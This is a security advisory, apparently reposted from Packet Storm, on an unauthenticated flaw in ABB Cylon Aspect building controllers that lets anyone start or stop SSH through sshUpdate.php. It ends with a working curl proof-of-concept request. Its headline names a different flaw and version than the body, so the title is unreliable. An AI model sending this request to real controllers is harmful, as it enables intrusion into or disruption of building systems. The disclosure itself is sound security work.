ABB Cylon Aspect 3.08.00 dialupSwitch.php Remote Code Execution

ABB Cylon Aspect version 3.07.02 suffers from a vulnerability that allows an unauthenticated attacker to enable or disable the SSH daemon by sending a POST request to sshUpdate.php with a simple JSON payload. This can be exploited to start the SSH service on the remote host without proper authentication, potentially enabling unauthorized access or stop and deny service access.

**ABB Cylon Aspect 3.07.02 sshUpdate.php Unauthenticated Remote SSH Service Control**

    ABB Cylon Aspect 3.07.02 (sshUpdate.php) Unauthenticated Remote SSH Service ControlVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.07.02Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The BMS/BAS controller suffers from a vulnerability that allows anunauthenticated attacker to enable or disable the SSH daemon by sending aPOST request to sshUpdate.php with a simple JSON payload. This can be exploitedto start the SSH service on the remote host without proper authentication,potentially enabling unauthorized access or stop and deny service access.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5838Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5838.phpCWE ID: 306CWE URL: https://cwe.mitre.org/data/definitions/306.html21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                                     ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                                                                                                $ curl -X POST "http://192.168.73.31/sshUpdate.php" \> -H "Content-Type: application/json" \> -d "{\"serviceAction\":\"start\", \"key\":\"sshenable\"}"

Source

Packet Storm